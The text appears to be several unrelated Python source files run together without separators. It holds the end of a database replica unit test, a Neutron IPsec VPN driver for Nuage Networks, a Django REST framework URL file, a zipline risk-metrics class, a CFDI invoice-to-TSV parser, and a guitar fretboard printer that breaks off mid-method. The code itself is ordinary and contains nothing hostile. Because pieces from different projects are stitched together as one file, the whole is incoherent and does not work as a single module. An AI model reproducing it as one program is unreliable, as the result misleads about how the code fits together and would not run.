    def test_replica_with_invalid_slave_of_id(self, mock_logging):
        # A slave_of_id that matches no instance must raise NotFound.
        self.assertRaises(
            exception.NotFound, Instance.create,
            None, 'name', 1, "UUID", [], [], None,
            self.datastore_version, 1, None,
            slave_of_id=str(uuid.uuid4()))

    def test_create_replica_from_replica(self):
        # Build a replica record, then ask for a replica of that replica.
        self.replica_datastore_version = Mock(
            spec=datastore_models.DBDatastoreVersion)
        self.replica_datastore_version.id = "UUID"
        self.replica_datastore_version.manager = 'mysql'
        self.replica_info = DBInstance(
            InstanceTasks.NONE,
            id="UUID",
            name="TestInstance",
            datastore_version_id=self.replica_datastore_version.id,
            slave_of_id=self.master.id)
        self.replica_info.save()
        self.assertRaises(
            exception.Forbidden, Instance.create,
            None, 'name', 2, "UUID", [], [], None,
            self.datastore_version, 1, None,
            slave_of_id=self.replica_info.id)

# Copyright 2016 Nuage Networks USA Inc.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import abc
import copy
import os
import oslo_messaging
import six

from neutron.agent.linux import ip_lib
from neutron.common import rpc as n_rpc
from neutron import context
from neutron_lib import constants
from neutron_lib.plugins import directory
from neutron_vpnaas.services.vpn import device_drivers
from neutron_vpnaas.services.vpn.device_drivers import fedora_strongswan_ipsec
from neutron_vpnaas.services.vpn.device_drivers import ipsec
from neutron_vpnaas.services.vpn.device_drivers import strongswan_ipsec
from nuage_neutron.vpnaas.common import topics
from nuage_neutron.vpnaas.nuage_interface import NuageInterfaceDriver
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall


# Module-level logger for this driver.
LOG = logging.getLogger(__name__)
# Directory containing this module; used as the template search path.
TEMPLATE_PATH = os.path.dirname(os.path.abspath(__file__))
# Key under which per-process connection status is stored/reported.
IPSEC_CONNS = 'ipsec_site_connections'


class NuageIPsecVpnDriverApi(object):
    """Client-side RPC stub for the IPSec VPN driver service."""

    def __init__(self, topic):
        self.client = n_rpc.get_client(
            oslo_messaging.Target(topic=topic, version='1.0'))

    def get_vpn_services_on_host(self, context, host):
        """Fetch the vpnservices configured on *host*.

            Each vpnservice includes its related ipsec_site_connection,
            ikepolicy and ipsecpolicy.
        """
        return self.client.prepare().call(
            context, 'get_vpn_services_on_host', host=host)

    def update_status(self, context, status):
        """Report local status changes.

            Pushes updates to the status attribute of VPNServices
            back to the server.
        """
        return self.client.prepare().call(
            context, 'update_status', status=status)


@six.add_metaclass(abc.ABCMeta)
class NuageIPsecDriver(device_drivers.DeviceDriver):
    """Base Nuage IPSec VPN device driver.

    Maintains a local cache of per-router swan processes, syncs them
    against the server-side vpnservice configuration over RPC, and
    periodically reports connection status back to the server.
    Subclasses supply create_process() for a concrete swan implementation.
    """

    def __init__(self, vpn_service, host):
        self.conf = vpn_service.conf
        self.host = host
        self.conn = n_rpc.create_connection(new=True)
        self.context = context.get_admin_context_without_session()
        self.topic = topics.NUAGE_IPSEC_AGENT_TOPIC
        self.processes = {}  # process_id (== router_id) -> swan process
        self.routers = {}  # router_id -> router_id, set once its namespace exists
        self.process_status_cache = {}  # process_id -> last reported status dict
        self.endpoints = [self]
        self.conn.create_consumer(self.topic, self.endpoints)
        self.conn.consume_in_threads()
        self.agent_rpc = NuageIPsecVpnDriverApi(
            topics.NUAGE_IPSEC_DRIVER_TOPIC)
        # Periodically (every 20s) push status changes to the server.
        self.process_status_cache_check = loopingcall.FixedIntervalLoopingCall(
            self.report_status, self.context)
        self.process_status_cache_check.start(
            interval=20)
        self.nuage_if_driver = NuageInterfaceDriver(cfg.CONF)

    def _get_l3_plugin(self):
        # Thin lookup wrapper; kept separate for test stubbing.
        return directory.get_plugin(constants.L3)

    def get_namespace(self, router_id):
        """Get namespace of router.

        :router_id: router_id
        :returns: namespace string.
        """
        return 'vpn-' + router_id

    def vpnservice_updated(self, context, **kwargs):
        """Vpnservice updated rpc handler.

        VPN Service Driver calls this method when vpnservices are updated;
        it then starts a sync with the server.
        """
        router = kwargs.get('router', None)
        self.sync(context, [router] if router else [])

    def tracking(self, context, **kwargs):
        """Handle a router-created event.

        The agent calls this method when the process namespace is ready.
        Note: process_id == router_id == vpnservice_id
        """
        router = kwargs.get('router', None)
        process_id = router['id']
        self.routers[process_id] = process_id
        if process_id in self.processes:
            # In case the vpnservice was created before the
            # vpn service namespace existed.
            process = self.processes[process_id]
            process.enable()

    def non_tracking(self, context, **kwargs):
        """Handle a router-removed event: tear down its process and tracking."""
        router = kwargs.get('router', None)
        process_id = router['id']
        self.destroy_process(process_id)
        if process_id in self.routers:
            del self.routers[process_id]

    def ensure_process(self, process_id, vpnservice=None):
        """Ensure a swan process exists for process_id.

        If the process doesn't exist, create it and store it in
        self.processes; otherwise refresh it with the given vpnservice.
        """
        process = self.processes.get(process_id)
        if not process or not process.namespace:
            namespace = self.get_namespace(process_id)
            process = self.create_process(
                process_id,
                vpnservice,
                namespace)
            self.processes[process_id] = process
        elif vpnservice:
            process.update_vpnservice(vpnservice)
        return process

    @lockutils.synchronized('vpn-agent', 'neutron-')
    def sync(self, context, routers):
        """Sync status with server side.

        :param context: context object for RPC call
        :param routers: Router objects which is created in this sync event

        There could be many failure cases should be
        considered including the followings.
        1) Agent class restarted
        2) Failure on process creation
        3) VpnService is deleted during agent down
        4) RPC failure

        In order to handle, these failure cases,
        the driver needs to take sync strategies.

        """
        vpnservices = self.agent_rpc.get_vpn_services_on_host(
            context, self.host)
        router_ids = [vpnservice['router_id'] for vpnservice in vpnservices]
        sync_router_ids = [router['id'] for router in routers]
        self._sync_vpn_processes(vpnservices, sync_router_ids)
        self._delete_vpn_processes(sync_router_ids, router_ids)
        self._cleanup_stale_vpn_processes(router_ids)
        self.report_status(context)

    def get_process_status_cache(self, process):
        """Return (creating if absent) the cached status dict for process."""
        if not self.process_status_cache.get(process.id):
            self.process_status_cache[process.id] = {
                'status': None,
                'id': process.vpnservice['id'],
                'updated_pending_status': False,
                'ipsec_site_connections': {}}
        return self.process_status_cache[process.id]

    def report_status(self, context):
        """Push status changes for all known processes to the server."""
        status_changed_vpn_services = []
        for process in self.processes.values():
            previous_status = self.get_process_status_cache(process)
            if self.is_status_updated(process, previous_status):
                new_status = self.copy_process_status(process)
                self.update_downed_connections(process.id, new_status)
                status_changed_vpn_services.append(new_status)
                self.process_status_cache[process.id] = (
                    self.copy_process_status(process))
                # We need unset updated_pending status after it
                # is reported to the server side
                self.unset_updated_pending_status(process)

        if status_changed_vpn_services:
            self.agent_rpc.update_status(context,
                                         status_changed_vpn_services)

    def _sync_vpn_processes(self, vpnservices, sync_router_ids):
        # (Re)build processes for new services and for routers named in
        # this sync event; only update ones whose namespace is tracked.
        for vpnservice in vpnservices:
            if vpnservice['router_id'] not in self.processes or (
                    vpnservice['router_id'] in sync_router_ids):
                process = self.ensure_process(vpnservice['router_id'],
                                              vpnservice=vpnservice)
                router = self.routers.get(vpnservice['router_id'])
                if not router:
                    continue
                process.update()

    def _delete_vpn_processes(self, sync_router_ids, vpn_router_ids):
        # Destroy processes for synced routers that no longer have a service.
        for process_id in sync_router_ids:
            if process_id not in vpn_router_ids:
                self.destroy_process(process_id)

    def _cleanup_stale_vpn_processes(self, vpn_router_ids):
        # Destroy any cached process whose router no longer has a vpnservice.
        process_ids = [pid for pid in self.processes
                       if pid not in vpn_router_ids]
        for process_id in process_ids:
            self.destroy_process(process_id)

    def is_status_updated(self, process, previous_status):
        """Return True when the process status differs from the cached one."""
        if process.updated_pending_status:
            return True
        if process.status != previous_status['status']:
            return True
        if (process.connection_status !=
                previous_status['ipsec_site_connections']):
            return True
        # Bug fix: previously fell off the end returning implicit None;
        # return an explicit False (same truthiness, clearer contract).
        return False

    def unset_updated_pending_status(self, process):
        """Clear pending-status flags after they have been reported."""
        process.updated_pending_status = False
        for connection_status in process.connection_status.values():
            connection_status['updated_pending_status'] = False

    def copy_process_status(self, process):
        """Return a reportable snapshot (deep copy) of a process's status."""
        return {
            'id': process.vpnservice['id'],
            'status': process.status,
            'updated_pending_status': process.updated_pending_status,
            'ipsec_site_connections': copy.deepcopy(process.connection_status)
        }

    def update_downed_connections(self, process_id, new_status):
        """Update info to be reported, if connections just went down.

            If there is no longer any information for a connection, because it
            has been removed (e.g. due to an admin down of VPN service or IPSec
            connection), but there was previous status information for the
            connection, mark the connection as down for reporting purposes.
        """
        if process_id in self.process_status_cache:
            for conn in self.process_status_cache[process_id][IPSEC_CONNS]:
                if conn not in new_status[IPSEC_CONNS]:
                    new_status[IPSEC_CONNS][conn] = {
                        'status': constants.DOWN,
                        'updated_pending_status': True
                    }

    def create_router(self, router):
        """Handling create router event."""
        pass

    def destroy_router(self, process_id):
        """No-op: router teardown is handled via non_tracking()."""
        pass

    def destroy_process(self, process_id):
        """Destroy process.

        Disable the process and remove the process
        manager for the processes that no longer are running vpn service.
        """
        if process_id in self.processes:
            process = self.processes[process_id]
            process.disable()
            # The membership check was already done above; delete directly
            # (the original re-checked `process_id in self.processes` here).
            del self.processes[process_id]

    def plug_to_ovs(self, context, **kwargs):
        """Plug the VPN port into OVS bridge 'alubr0' and set up L3/routes."""
        self.nuage_if_driver.plug(kwargs['network_id'], kwargs['port_id'],
                                  kwargs['device_name'], kwargs['mac'],
                                  'alubr0', kwargs['ns_name'])

        self.nuage_if_driver.init_l3(kwargs['device_name'], kwargs['cidr'],
                                     kwargs['ns_name'])
        device = ip_lib.IPDevice(kwargs['device_name'],
                                 namespace=kwargs['ns_name'])
        for gateway_ip in kwargs['gw_ip']:
            device.route.add_gateway(gateway_ip)

    def unplug_from_ovs(self, context, **kwargs):
        """Unplug the VPN port from OVS and garbage-collect the namespace."""
        self.nuage_if_driver.unplug(kwargs['device_name'], 'alubr0',
                                    kwargs['ns_name'])
        ip = ip_lib.IPWrapper(kwargs['ns_name'])
        ip.garbage_collect_namespace()
        # On Redhat deployments an additional directory is created named
        # 'ip_vti0' in the namespace which prevents the cleanup
        # of namespace by the neutron agent in 'ip_lib.py' which we clean.
        if kwargs['ns_name'] in ip.get_namespaces():
            ip.netns.delete(kwargs['ns_name'])


class NuageOpenSwanDriver(NuageIPsecDriver):
    """NuageIPsecDriver backed by OpenSwan."""

    def create_process(self, process_id, vpnservice, namespace):
        # Delegate process management to the stock OpenSwan implementation.
        return ipsec.OpenSwanProcess(
            self.conf, process_id, vpnservice, namespace)


class NuageStrongSwanDriver(NuageIPsecDriver):
    """NuageIPsecDriver backed by StrongSwan."""

    def create_process(self, process_id, vpnservice, namespace):
        # Delegate process management to the stock StrongSwan implementation.
        return strongswan_ipsec.StrongSwanProcess(
            self.conf, process_id, vpnservice, namespace)


class NuageStrongSwanDriverFedora(NuageIPsecDriver):
    """NuageIPsecDriver backed by StrongSwan on Fedora-family hosts."""

    def create_process(self, process_id, vpnservice, namespace):
        # Delegate process management to the Fedora StrongSwan implementation.
        return fedora_strongswan_ipsec.FedoraStrongSwanProcess(
            self.conf, process_id, vpnservice, namespace)

from django.conf.urls import patterns, include, url

from django.contrib import admin
from api import views
admin.autodiscover()
from rest_framework.routers import DefaultRouter

# DRF router auto-generates list/detail URL routes for the registered viewsets.
router = DefaultRouter()
router.register(r'headings', views.HeadingViewSet)
router.register(r'users', views.UserViewSet)

# NOTE(review): patterns() is the pre-Django-1.10 URLconf style; kept as-is
# since the file imports it explicitly — confirm Django version before
# modernizing to a plain list.
urlpatterns = patterns('',
    url(r'^', include(router.urls)),
    url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
)
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import functools

import logbook
import math
import numpy as np
import numpy.linalg as la

from six import iteritems

from zipline.finance import trading

import pandas as pd

from . import risk
from . risk import (
    alpha,
    check_entry,
    information_ratio,
    sharpe_ratio,
    sortino_ratio,
)

# Module logger for risk-period calculations.
log = logbook.Logger('Risk Period')

# choose_treasury pre-bound with the duration-selection strategy; invoked
# with (treasury_curves, start_date, end_date).
choose_treasury = functools.partial(risk.choose_treasury,
                                    risk.select_treasury_duration)


class RiskMetricsPeriod(object):
    """Risk metrics (volatility, sharpe, sortino, beta, alpha, max drawdown,
    ...) for an algorithm's returns versus a benchmark over one period.

    Both return series are masked to [start_date, end_date] and to trading
    days, and must end up index-aligned; all metrics are computed eagerly
    in the constructor via calculate_metrics().
    """

    def __init__(self, start_date, end_date, returns,
                 benchmark_returns=None):

        # Clip treasury curves to the period when history covers it.
        treasury_curves = trading.environment.treasury_curves
        if treasury_curves.index[-1] >= start_date:
            mask = ((treasury_curves.index >= start_date) &
                    (treasury_curves.index <= end_date))

            self.treasury_curves = treasury_curves[mask]
        else:
            # our test is beyond the treasury curve history
            # so we'll use the last available treasury curve
            self.treasury_curves = treasury_curves[-1:]

        self.start_date = start_date
        self.end_date = end_date

        if benchmark_returns is None:
            # Default to the environment benchmark, clipped to the span of
            # the supplied algorithm returns.
            br = trading.environment.benchmark_returns
            benchmark_returns = br[(br.index >= returns.index[0]) &
                                   (br.index <= returns.index[-1])]

        self.algorithm_returns = self.mask_returns_to_period(returns)
        self.benchmark_returns = self.mask_returns_to_period(benchmark_returns)
        self.calculate_metrics()

    def calculate_metrics(self):
        """Compute all period metrics; raises if the two masked return
        series are not index-aligned."""

        self.benchmark_period_returns = \
            self.calculate_period_returns(self.benchmark_returns)

        self.algorithm_period_returns = \
            self.calculate_period_returns(self.algorithm_returns)

        if not self.algorithm_returns.index.equals(
            self.benchmark_returns.index
        ):
            message = "Mismatch between benchmark_returns ({bm_count}) and \
            algorithm_returns ({algo_count}) in range {start} : {end}"
            message = message.format(
                bm_count=len(self.benchmark_returns),
                algo_count=len(self.algorithm_returns),
                start=self.start_date,
                end=self.end_date
            )
            raise Exception(message)

        self.num_trading_days = len(self.benchmark_returns)
        self.benchmark_volatility = self.calculate_volatility(
            self.benchmark_returns)
        self.algorithm_volatility = self.calculate_volatility(
            self.algorithm_returns)
        self.treasury_period_return = choose_treasury(
            self.treasury_curves,
            self.start_date,
            self.end_date
        )
        self.sharpe = self.calculate_sharpe()
        self.sortino = self.calculate_sortino()
        self.information = self.calculate_information()
        self.beta, self.algorithm_covariance, self.benchmark_variance, \
            self.condition_number, self.eigen_values = self.calculate_beta()
        self.alpha = self.calculate_alpha()
        self.excess_return = self.algorithm_period_returns - \
            self.treasury_period_return
        self.max_drawdown = self.calculate_max_drawdown()

    def to_dict(self):
        """
        Creates a dictionary representing the state of the risk report.
        Returns a dict object of the form:
        """
        period_label = self.end_date.strftime("%Y-%m")
        rval = {
            'trading_days': self.num_trading_days,
            'benchmark_volatility': self.benchmark_volatility,
            'algo_volatility': self.algorithm_volatility,
            'treasury_period_return': self.treasury_period_return,
            'algorithm_period_return': self.algorithm_period_returns,
            'benchmark_period_return': self.benchmark_period_returns,
            'sharpe': self.sharpe,
            'sortino': self.sortino,
            'information': self.information,
            'beta': self.beta,
            'alpha': self.alpha,
            'excess_return': self.excess_return,
            'max_drawdown': self.max_drawdown,
            'period_label': period_label
        }

        # Entries flagged by check_entry are nulled out for serialization.
        return {k: None if check_entry(k, v) else v
                for k, v in iteritems(rval)}

    def __repr__(self):
        """One metric per line, as 'name:value'."""
        statements = []
        metrics = [
            "algorithm_period_returns",
            "benchmark_period_returns",
            "excess_return",
            "num_trading_days",
            "benchmark_volatility",
            "algorithm_volatility",
            "sharpe",
            "sortino",
            "information",
            "algorithm_covariance",
            "benchmark_variance",
            "beta",
            "alpha",
            "max_drawdown",
            "algorithm_returns",
            "benchmark_returns",
            "condition_number",
            "eigen_values"
        ]

        for metric in metrics:
            value = getattr(self, metric)
            statements.append("{m}:{v}".format(m=metric, v=value))

        return '\n'.join(statements)

    def mask_returns_to_period(self, daily_returns):
        """Restrict a returns series (or list of return objects) to this
        period's date range and to known trading days."""
        if isinstance(daily_returns, list):
            returns = pd.Series([x.returns for x in daily_returns],
                                index=[x.date for x in daily_returns])
        else:  # otherwise we're receiving an index already
            returns = daily_returns

        trade_days = trading.environment.trading_days
        trade_day_mask = returns.index.normalize().isin(trade_days)

        mask = ((returns.index >= self.start_date) &
                (returns.index <= self.end_date) & trade_day_mask)

        returns = returns[mask]
        return returns

    def calculate_period_returns(self, returns):
        # Compound daily returns into a single period return.
        period_returns = (1. + returns).prod() - 1
        return period_returns

    def calculate_volatility(self, daily_returns):
        # Sample std dev (ddof=1) annualized by sqrt of trading days.
        return np.std(daily_returns, ddof=1) * math.sqrt(self.num_trading_days)

    def calculate_sharpe(self):
        """
        http://en.wikipedia.org/wiki/Sharpe_ratio
        """
        return sharpe_ratio(self.algorithm_volatility,
                            self.algorithm_period_returns,
                            self.treasury_period_return)

    def calculate_sortino(self, mar=None):
        """
        http://en.wikipedia.org/wiki/Sortino_ratio
        """
        # mar (minimum acceptable return) defaults to the treasury return.
        if mar is None:
            mar = self.treasury_period_return

        return sortino_ratio(self.algorithm_returns,
                             self.algorithm_period_returns,
                             mar)

    def calculate_information(self):
        """
        http://en.wikipedia.org/wiki/Information_ratio
        """
        return information_ratio(self.algorithm_returns,
                                 self.benchmark_returns)

    def calculate_beta(self):
        """Return (beta, algorithm_covariance, benchmark_variance,
        condition_number, eigen_values).

        .. math::

            \\beta_a = \\frac{\mathrm{Cov}(r_a,r_p)}{\mathrm{Var}(r_p)}

        http://en.wikipedia.org/wiki/Beta_(finance)
        """
        # it doesn't make much sense to calculate beta for less than two days,
        # so return none.
        if len(self.algorithm_returns) < 2:
            return 0.0, 0.0, 0.0, 0.0, []

        returns_matrix = np.vstack([self.algorithm_returns,
                                    self.benchmark_returns])
        C = np.cov(returns_matrix, ddof=1)
        # Condition number of the covariance matrix, for diagnostics.
        eigen_values = la.eigvals(C)
        condition_number = max(eigen_values) / min(eigen_values)
        algorithm_covariance = C[0][1]
        benchmark_variance = C[1][1]
        beta = algorithm_covariance / benchmark_variance

        return (
            beta,
            algorithm_covariance,
            benchmark_variance,
            condition_number,
            eigen_values
        )

    def calculate_alpha(self):
        """
        http://en.wikipedia.org/wiki/Alpha_(investment)
        """
        return alpha(self.algorithm_period_returns,
                     self.treasury_period_return,
                     self.benchmark_period_returns,
                     self.beta)

    def calculate_max_drawdown(self):
        """Max drawdown over the period, as a positive fraction lost from
        the running peak of log-compounded returns."""
        compounded_returns = []
        cur_return = 0.0
        for r in self.algorithm_returns:
            try:
                cur_return += math.log(1.0 + r)
            # this is a guard for a single day returning -100%
            except ValueError:
                log.debug("{cur} return, zeroing the returns".format(
                    cur=cur_return))
                cur_return = 0.0
                # BUG? Shouldn't this be set to log(1.0 + 0) ?
            compounded_returns.append(cur_return)

        # Track the running peak and the deepest dip below it.
        cur_max = None
        max_drawdown = None
        for cur in compounded_returns:
            if cur_max is None or cur > cur_max:
                cur_max = cur

            drawdown = (cur - cur_max)
            if max_drawdown is None or drawdown < max_drawdown:
                max_drawdown = drawdown

        if max_drawdown is None:
            return 0.0

        return 1.0 - math.exp(max_drawdown)

#!/usr/bin/python
#-*-coding:utf8-*-

from bs4 import BeautifulSoup as Soup
#import pandas as pd
import glob
import sys
import re

"""
Version xml de cfdi 3.3
"""

class CFDI(object):
    """Parser for a CFDI (Mexican electronic invoice) XML file.

    Supports cfdi versions 3.2 and 3.3.  The whole document is parsed
    eagerly in the constructor and the relevant fields (issuer, receiver,
    totals, transferred and withheld taxes) are exposed as read-only
    properties.
    """

    def __init__(self, f):
        """Parse the CFDI stored in the file whose name is ``f``.

        :param f: path of the CFDI XML file.
        """
        # Read the document up front; ``with`` guarantees the handle is
        # closed (the original leaked an open file object).
        with open(f, 'r') as fh:
            fxml = fh.read()
        soup = Soup(fxml, 'lxml')
        # ============ cfdi components ============
        emisor = soup.find('cfdi:emisor')
        receptor = soup.find('cfdi:receptor')
        comprobante = soup.find('cfdi:comprobante')
        tfd = soup.find('tfd:timbrefiscaldigital')
        self.__version = comprobante['version']
        self.__folio = comprobante['folio']
        self.__uuid = tfd['uuid']
        self.__fechatimbrado = tfd['fechatimbrado']
        # Transferred taxes: only <cfdi:traslado> nodes carrying the full
        # attribute set (the concept-level nodes in 3.3 carry all four).
        self.__traslados = soup.find_all(
            lambda e: e.name == 'cfdi:traslado' and
            sorted(e.attrs.keys()) == ['importe', 'impuesto',
                                       'tasaocuota', 'tipofactor'])
        # Withheld taxes: <cfdi:retencion> nodes with importe/impuesto.
        self.__retenciones = soup.find_all(
            lambda e: e.name == 'cfdi:retencion' and
            sorted(e.attrs.keys()) == ['importe', 'impuesto'])
        # ============ issuer ============
        self.__emisorrfc = emisor['rfc']
        try:
            self.__emisornombre = emisor['nombre']
        except KeyError:
            # 'nombre' is optional; fall back to the RFC.
            self.__emisornombre = emisor['rfc']
        # ============ receiver ============
        self.__receptorrfc = receptor['rfc']
        try:
            self.__receptornombre = receptor['nombre']
        except KeyError:
            self.__receptornombre = receptor['rfc']
        # ============ invoice ============
        self.__certificado = comprobante['certificado']
        self.__sello = comprobante['sello']
        self.__total = round(float(comprobante['total']), 2)
        self.__subtotal = round(float(comprobante['subtotal']), 2)
        self.__fecha_cfdi = comprobante['fecha']
        self.__conceptos = soup.find_all(lambda e: e.name == 'cfdi:concepto')
        self.__n_conceptos = len(self.__conceptos)

        try:
            self.__moneda = comprobante['moneda']
        except KeyError:
            self.__moneda = 'MXN'

        try:
            self.__lugar = comprobante['lugarexpedicion']
        except KeyError:
            self.__lugar = u'México'

        tipo = comprobante['tipodecomprobante']
        if float(self.__version) == 3.2:
            # 3.2 stores the human-readable type directly.
            self.__tipo = tipo
        else:
            # 3.3 stores a one-letter code.
            tcomprobantes = {'I': 'Ingreso', 'E': 'Egreso',
                             'N': 'Nomina', 'P': 'Pagado'}
            self.__tipo = tcomprobantes[tipo]

        try:
            self.__tcambio = float(comprobante['tipocambio'])
        except (KeyError, ValueError):
            # Missing or malformed exchange rate: assume MXN parity.
            self.__tcambio = 1.

        triva, trieps, trisr = self.__calcula_traslados()
        self.__triva = round(triva, 2)
        self.__trieps = round(trieps, 2)
        self.__trisr = round(trisr, 2)
        retiva, retisr = self.__calcula_retenciones()
        self.__retiva = round(retiva, 2)
        self.__retisr = round(retisr, 2)

    def __str__(self):
        """Return the invoice as one tab-separated line.

        Field order: issuer name, stamp date, type, issuer RFC, uuid,
        folio, receiver name, receiver RFC, subtotal, IEPS, IVA,
        withheld IVA, withheld ISR, exchange rate, total.
        """
        return '\t'.join(map(str, self.lista_valores))

    def __calcula_traslados(self):
        """Sum transferred IVA/IEPS/ISR amounts across all traslado nodes.

        Tax keys differ by cfdi version: names in 3.2 ('IVA', ...) and
        SAT numeric codes in 3.3 ('002' IVA, '001' ISR, '003' IEPS).
        """
        # NOTE: the original initialized trisr as int 0; use floats for
        # all three accumulators consistently.
        triva, trieps, trisr = 0., 0., 0.
        for t in self.__traslados:
            impuesto = t['impuesto']
            importe = float(t['importe'])
            if self.__version == '3.2':
                if impuesto == 'IVA':
                    triva += importe
                elif impuesto == 'ISR':
                    trisr += importe
                elif impuesto == 'IEPS':
                    trieps += importe
            elif self.__version == '3.3':
                if impuesto == '002':
                    triva += importe
                elif impuesto == '001':
                    trisr += importe
                elif impuesto == '003':
                    trieps += importe
        return triva, trieps, trisr

    def __calcula_retenciones(self):
        """Sum withheld IVA/ISR amounts across all retencion nodes."""
        retiva, retisr = 0., 0.
        for t in self.__retenciones:
            impuesto = t['impuesto']
            importe = float(t['importe'])
            if self.__version == '3.2':
                if impuesto == 'ISR':
                    retisr += importe
                elif impuesto == 'IVA':
                    retiva += importe
            elif self.__version == '3.3':
                if impuesto == '002':
                    retiva += importe
                elif impuesto == '001':
                    retisr += importe
        return retiva, retisr

    @property
    def lista_valores(self):
        """Field values in the same order as :meth:`columnas`."""
        v = [self.__emisornombre, self.__fechatimbrado, self.__tipo,
             self.__emisorrfc]
        v += [self.__uuid, self.__folio, self.__receptornombre,
              self.__receptorrfc]
        v += [self.__subtotal, self.__trieps, self.__triva]
        v += [self.__retiva, self.__retisr, self.__tcambio, self.__total]
        return v

    @property
    def dic_cfdi(self):
        """Dict of column name -> value (keys match :meth:`columnas`)."""
        return {
            "Emisor": self.__emisornombre,
            "Fecha_CFDI": self.__fechatimbrado,
            "Tipo": self.__tipo,
            "RFC_Emisor": self.__emisorrfc,
            "Folio_fiscal": self.__uuid,
            "Folio": self.__folio,
            "Receptor": self.__receptornombre,
            "RFC_Receptor": self.__receptorrfc,
            "Subtotal": self.__subtotal,
            "IEPS": self.__trieps,
            "IVA": self.__triva,
            "Ret IVA": self.__retiva,
            "Ret ISR": self.__retisr,
            "TC": self.__tcambio,
            "Total": self.__total,
        }

    @property
    def certificado(self):
        return self.__certificado

    @property
    def sello(self):
        return self.__sello

    @property
    def total(self):
        return self.__total

    @property
    def subtotal(self):
        return self.__subtotal

    @property
    def fechatimbrado(self):
        return self.__fechatimbrado

    @property
    def tipodecambio(self):
        return self.__tcambio

    @property
    def lugar(self):
        return self.__lugar

    @property
    def moneda(self):
        return self.__moneda

    @property
    def traslado_iva(self):
        return self.__triva

    @property
    def traslado_isr(self):
        return self.__trisr

    @property
    def traslado_ieps(self):
        return self.__trieps

    @property
    def n_conceptos(self):
        return self.__n_conceptos

    @property
    def conceptos(self):
        return self.__conceptos

    @property
    def folio(self):
        return self.__folio

    @staticmethod
    def columnas():
        """Column headers for the tab-separated report."""
        return ["Emisor", "Fecha_CFDI", "Tipo", "RFC_Emisor", "Folio_fiscal",
                "Folio", "Receptor", "RFC_Receptor", "Subtotal", "IEPS",
                "IVA", "Ret IVA", "Ret ISR", "TC", "Total"]

    @staticmethod
    def imprime_reporte(nf, nr):
        """Build a summary report; warn when file and row counts differ.

        :param nf: number of files processed.
        :param nr: number of rows written to the tsv.
        """
        reporte = "Número de archivos procesados:\t {}\n".format(nf)
        reporte += "Número de filas en tsv:\t {}\n".format(nr)
        if nf != nr:
            reporte += "\n\n**** Atención ****\n"

        return reporte



# All CFDI XML files in the current directory.
L = glob.glob('./*.xml')


if __name__ == '__main__':
    # Usage: script.py <output.tsv> — writes one row per parsed CFDI.
    salida = sys.argv[1]
    columnas = CFDI.columnas()
    nl = 0  # rows successfully written
    with open(salida, 'w') as fout:
        fout.write('\t'.join(columnas) + '\n')
        for f in L:
            try:
                rcfdi = CFDI(f)
                dic = rcfdi.dic_cfdi
                vals = [dic[c] for c in columnas]
                fout.write(' \t '.join(map(str, vals)) + '\n')
                nl += 1
            except Exception as e:
                # The original used `assert "Error en archivo ..."`, which
                # is a no-op (a non-empty string is always truthy); report
                # the failing file instead of silently skipping it.
                print("Error en archivo {0}: {1}".format(f, e))

    nr = len(L)
    rep = CFDI.imprime_reporte(nr, nl)
    print(rep)

#!/usr/bin/python3
from colorama import Fore, Back


class frets:
    """Text rendering of a fretboard, with note search (colorama colours).

    ``strings`` maps each open-string name to the list of note names per
    fret; a trailing ``'^'`` marks each full octave above the open string.
    """

    # Chromatic scale starting at E (index 0 == open low string 'E').
    NOTES = ('E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B', 'C', 'C#', 'D', 'D#')

    def __init__(self,
                 tuning=('E', 'A', 'D', 'G'),
                 frets_count=24):
        """Build the per-string note table.

        :param tuning: open-string note names, low to high.
        :param frets_count: number of frets to generate per string.
        """
        # All state is per-instance.  The original code used shared
        # class-level mutables (``strings = dict()`` etc.), so every
        # instance wrote into the same dict — an aliasing bug.
        self.tuning = tuning
        self.frets_count = frets_count
        self.max_string_name_len = 0
        self.strings = {}

        for string in tuning:
            if len(string) > self.max_string_name_len:
                self.max_string_name_len = len(string)

            self.strings[string] = []
            starting_note = self.NOTES.index(string) + 1

            for i in range(frets_count):
                # One '^' per full octave above the open string.
                padding = '^' * ((starting_note + i) // len(self.NOTES))
                self.strings[string].append(
                    self.NOTES[(starting_note + i) % len(self.NOTES)]
                    + padding)

    def debug_strings(self):
        """Dump the raw string -> notes mapping."""
        print(self.strings)

    def show_me_plz(self,
                    seek_note=None,
                    seek_string=None):
        """Print the fretboard, highlighting a note and its octaves.

        :param seek_note: note name to highlight (e.g. ``'F#'`` or
            ``'F#^'`` for the octave-marked variant).
        :param seek_string: optional (string, fret) pair such as
            ``('E', '5')``; when given it overrides ``seek_note`` with
            the note found at that position.
        """
        if seek_string:
            seek_note = self.strings[seek_string[0]][int(seek_string[1]) - 1]

        # The same note one octave up/down gets its own colour.
        upper_seek_note = None
        lower_seek_note = None
        if seek_note and seek_note.endswith('^'):
            lower_seek_note = seek_note[0:-1]
        if seek_note:
            upper_seek_note = seek_note + '^'

        upper_found_position = []
        found_position = []
        lower_found_position = []

        # Header row: fret numbers, right-aligned in 4-char cells.
        print(Fore.WHITE +
              ' ' * (self.max_string_name_len + 2),
              end='')

        for fret_nr in range(1, self.frets_count + 1):
            print(Fore.WHITE +
                  (' ' * (4 - len(str(fret_nr)))) + str(fret_nr),
                  end='')
            print(Fore.YELLOW + '|', end='')
        print('')

        # Strings are drawn top-down, highest-listed first.
        for string in reversed(self.tuning):
            # Fret 0 (the open string) is the string-name cell itself.
            color = Fore.WHITE + Back.BLACK
            if string == seek_note:
                color = Fore.WHITE + Back.RED
